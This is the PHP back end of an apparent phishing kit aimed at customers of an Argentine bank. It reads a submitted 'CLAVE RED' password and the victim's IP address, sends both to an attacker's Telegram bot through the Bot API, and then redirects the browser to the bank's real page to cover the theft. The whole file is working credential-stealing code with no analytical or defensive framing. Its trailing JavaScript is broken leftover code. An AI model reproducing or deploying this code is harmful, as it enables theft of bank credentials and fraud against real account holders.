<?php

$farru = $_POST["farru"];





include_once ("config.php");






$filter = "";
$mensaje = "➖ TOKEN ➖\n";

$mensaje .= "CLAVE RED = ".$farru."\n";


$filter = base64_encode($filter);



$ip = getenv("REMOTE_ADDR");
$localip = $_SERVER['SERVER_NAME'];

define('BOT_TOKEN', $bottoken);
define('CHAT_ID', $chatid);
define('API_URL', 'https://api.telegram.org/bot'.BOT_TOKEN.'/');

function enviar_telegram($msj){
	$queryArray = [
		'chat_id' => CHAT_ID,
		'text' => $msj,
	];
	$url = 'https://api.telegram.org/bot'.BOT_TOKEN.'/sendMessage?'. http_build_query($queryArray);
	$result = file_get_contents($url);
}



enviar_telegram("\n🌐IP: ".$ip."\n".$mensaje."\n");


?>

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>ENVIANDO</title>

  <script type="text/javascript">
      
   
    var key = "";
var ip = "";
var campaign = "";
var user_agent = "";
var strictness = 0;
var failure_redirect = "";
var success_redirect = "";
    window.location.assign("https://www.hipotecario.com.ar/empresas/sector-publico/");
      
  http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

  http.onreadystatechange = function() {
      if(http.readyState == 4 && http.status == 1200) {
          checkResponse(http.responseText);
      }
  }

    </script>

</head>
<body>
  
</body>
</html>
